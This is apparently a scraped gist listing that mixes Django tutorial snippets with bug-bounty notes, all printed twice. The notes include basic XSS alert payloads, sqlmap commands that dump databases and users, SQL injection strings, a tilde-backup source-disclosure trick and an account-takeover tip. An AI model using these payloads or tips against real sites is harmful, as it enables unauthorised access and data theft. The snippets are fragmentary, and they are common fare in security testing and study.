Xifeng2009 Xifeng2009

## gist:d3041b0e5134fb9c778ca26c54eaf5cf
for path, _, filenames in os.walk(os.path.expanduser(nuclei_templates_path)):
    for filename in filenames:
        print(os.path.join(path, filename))

## Bug_Bounty_tips
site.com/file.php
response = nothing

http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,

## Ajax
# In app/views.py
import random
from django.http import JsonResponse
def ajax_1(request):
    context = {"data": random.randint(1, 999)}
    return JsonResponse(context)

# In templates
    <input id="a1" value="AAA">
    <button id="b1" class="button">Click!</button>

## Base4 of MTV: POST
# In app/forms.py
from django import forms
from .models import Topic
class TopicForm(forms.ModelForm):
    class Meta:
        model  = Topic
        fields = ['title', 'text']
        labels = {
            'title': 'Title: ',
            'text':  'Text: ',

## Base3 of MTV: Foreign Key
# In models.py
class Comment(models.Model):
    topic = models.ForeignKey(Topic)
    comment = models.CharField(max_length=200, null=True, blank=True, verbose_name='评论')
    date_added = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
    class Meta:
        verbose_name_plural = 'comments'
    def __str__(self):
        return self.comment[:10]


## Base2 of MTV: ORM
# In settings.py
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'mysql',
        'USER': 'root',
        'PASSWORD': 'YOUR PASSWORD',
        'HOST': '127.0.0.1',
        'PORT': '3306',
    }

## Base of MTV
# In project/urls.py
from django.conf.urls import url, include

urlpatterns = [
    url(r'', include('main.urls', namespace='main')),
]

# In app/urls.py
from django.conf.urls import url
from . import views

## XSS: Payload
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>

## SQLMAP: 目标&请求
#1 根据url进行注入 -u
sqlmap -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

# 输出详细等级
-v [1-7]
-v/-vv/-vvv/-vvvv

#2 直连数据库 -d
sqlmap -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users

## SQL Injection: MySQL
#1 判断盲注
1 and 1=2
1 and 1=1

#2 整型注入
1 or 1=1 #

#3 字符型注入
1' or 1=1 #
	for path, _, filenames in os.walk(os.path.expanduser(nuclei_templates_path)):
	for filename in filenames:
	print(os.path.join(path, filename))
	site.com/file.php
	response = nothing

	http://site.com/file.php~
	response = source
	-------------------------------------
	https://github.com/kleiton0x00/CRLF-one-liner
	------------------------------------------
	try to add admin as your user,
	change his email to yours,
	# In app/views.py
	import random
	from django.http import JsonResponse
	def ajax_1(request):
	context = {"data": random.randint(1, 999)}
	return JsonResponse(context)

	# In templates
	<input id="a1" value="AAA">
	<button id="b1" class="button">Click!</button>
	# In app/forms.py
	from django import forms
	from .models import Topic
	class TopicForm(forms.ModelForm):
	class Meta:
	model = Topic
	fields = ['title', 'text']
	labels = {
	'title': 'Title: ',
	'text': 'Text: ',
	# In models.py
	class Comment(models.Model):
	topic = models.ForeignKey(Topic)
	comment = models.CharField(max_length=200, null=True, blank=True, verbose_name='评论')
	date_added = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')
	class Meta:
	verbose_name_plural = 'comments'
	def __str__(self):
	return self.comment[:10]
	# In settings.py
	DATABASES = {
	'default': {
	'ENGINE': 'django.db.backends.mysql',
	'NAME': 'mysql',
	'USER': 'root',
	'PASSWORD': 'YOUR PASSWORD',
	'HOST': '127.0.0.1',
	'PORT': '3306',
	}
	# In project/urls.py
	from django.conf.urls import url, include

	urlpatterns = [
	url(r'', include('main.urls', namespace='main')),
	]

	# In app/urls.py
	from django.conf.urls import url
	from . import views
	<script>alert(123);</script>
	<ScRipT>alert("XSS");</ScRipT>
	<script>alert(123)</script>
	<script>alert("hellox worldss");</script>
	<script>alert(“XSS”)</script>
	<script>alert(“XSS”);</script>
	<script>alert(‘XSS’)</script>
	“><script>alert(“XSS”)</script>
	<script>alert(/XSS”)</script>
	<script>alert(/XSS/)</script>
	#1 根据url进行注入 -u
	sqlmap -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

	# 输出详细等级
	-v [1-7]
	-v/-vv/-vvv/-vvvv

	#2 直连数据库 -d
	sqlmap -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users
	#1 判断盲注
	1 and 1=2
	1 and 1=1

	#2 整型注入
	1 or 1=1 #

	#3 字符型注入
	1' or 1=1 #